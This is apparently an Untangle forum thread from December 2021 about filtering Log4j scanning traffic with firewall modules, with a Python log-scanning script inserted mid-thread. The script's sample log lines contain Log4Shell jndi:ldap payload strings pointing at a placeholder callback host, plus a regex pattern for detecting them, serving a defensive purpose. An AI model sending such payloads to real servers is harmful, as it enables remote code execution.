This is what my Nessus scan of NGFW looks like, no CVE-2021-44228, but.....
Nessus Scan.png
Started Youtube Channel, Have a question about Untangle Ask me : jason @ jasonslab.ca
https://www.youtube.com/c/jasonslabvideos << Please like and subscribe, helps me out !!
Nope, just let it ride and make the exceptions you need. It's really handy for protecting web servers because it filters out a bucket of log4j scanning right now.
Which is a ton more useful than an intrusion prevention module that cannot see the URI string to do anything!
Rob Sandling, BS:SWE, MCP
NexgenAppliances.com
Phone: 866-794-8879 x201
Email: support@nexgenappliances.com
Was that before or after you spammed me twice with a request that I go into more detail about which I was quite clear once already?
Oh... and for FREE I might add. I have kids to feed, I get PAID for professional tech support.
You were quite rude, I responded bluntly but appropriately. And now you come here to air dirty laundry in public? How classy!
Seriously, and all over a 1 line rule?
It seems to me that you want to use my knowledge and experience for your own gain, but only when I give it away in tiny personalized bite-sized pieces for free. You want more for free, go read the wiki. It has all you need to answer both questions, in less than 1 paragraph.
Last edited by sky-knight; 12-17-2021 at 01:40 PM.
Be nice folks. It's the holidays for goodwill to all people.
Attention: Support and help on the Untangle Forums is provided by
volunteers and community members like yourself.
If you need Untangle support please call or email support@untangle.com
I must be doing something wrong. I have Intrusion Prevention set to block the 46 signatures that contain log4j, yet I see nothing getting blocked. When I look at my modsecurity logs I still see a lot of the jndi:ldap:// type of requests. It's like it's skipping right past Intrusion Prevention.
EDIT: Ok, realized it's Threat Prevention people are speaking of, but still can't get it. For example, I did a rule to block URI is jndi. However, that went right through on a test.
Last edited by sspeed; 12-17-2021 at 02:59 PM.
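An added example, not written by anyone in this thread: one way to check from the web server side whether jndi requests are still getting past the firewall, by scanning access log lines and counting hits per source address. It assumes Apache/nginx Combined Log Format; the sample lines, IP addresses and hostname are constructed.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Combined Log Format: ip - user [time] "request" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
# The lookup string discussed in the thread, matched case-insensitively.
JNDI_RE = re.compile(r'\$\{jndi:', re.IGNORECASE)

def decode(value, rounds=3):
    """Percent-decode repeatedly so singly and doubly encoded strings are seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_jndi_hits(lines):
    """Return (ip, time, field) for each log line carrying a jndi lookup."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line
        for field in ("request", "referer", "agent"):
            if JNDI_RE.search(decode(m.group(field))):
                hits.append((m.group("ip"), m.group("time"), field))
                break  # count each line once
    return hits

def hits_per_source(lines):
    """Count matching requests per client address."""
    return Counter(ip for ip, _, _ in find_jndi_hits(lines))

# Constructed sample lines (documentation IP ranges, placeholder hostname).
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Dec/2021:13:02:11 -0500] "GET /?x=${jndi:ldap://callback.example/a} HTTP/1.1" 404 153 "-" "curl/7.79.1"',
    '198.51.100.23 - - [17/Dec/2021:13:05:40 -0500] "GET / HTTP/1.1" 200 5120 "-" "${jndi:ldap://callback.example/a}"',
    '203.0.113.7 - - [17/Dec/2021:13:09:02 -0500] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example%2Fa%7D HTTP/1.1" 404 153 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [17/Dec/2021:13:10:15 -0500] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, count in hits_per_source(SAMPLE_LOG).most_common():
        print(f"{ip}\t{count}")
```

Running it on logs from before and after a rule change shows whether the rule is actually stopping these requests before they reach the server.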
No, you have Intrusion Prevention configured correctly if you have those rules set to block. The problem is the module will never see the URI field because all the traffic is encrypted. You have to use SSL inspector to terminate the SSL inbound on Untangle, and then forward on the traffic to the web server. This reality is a bit cumbersome to deal with on NGFW, which is why Untangle has a new Web Application Firewall product.
That being said, I recommend use of Policy Manager to direct all ingress web traffic on NGFW to its own policy, from there you can install a curated list of modules. Threat Prevention in this policy is a risk... you WILL have to keep a close eye on it. However, if you deploy Threat Prevention in such a way that it's responsible for ingress web traffic, it will control traffic based on the reputations of the IPs in question. The addresses that are abusing our web servers with these exploit attempts are largely crap, so Threat Prevention behaves accordingly. This in turn cleans up your web access logs.
I'm using it on my public website, as well as my RMM currently. It's not great at times because the locations my agents are checking in from often also have terrible reputations. For these locations I use IP address in a policy rule to push the traffic to yet another policy that doesn't have Threat Prevention. Basically I have a single policy rule that has a growing list of IP addresses in it. Occasionally I just delete them all and start over.
P.S. If you decide to use Threat Prevention on your own web content, there's a check box under its advanced tab you're going to want to enable.
Last edited by sky-knight; 12-17-2021 at 03:21 PM.
I think this is the way: at 28:40 change the rule to Log4j
https://www.youtube.com/watch?v=o36ep-u-Ayo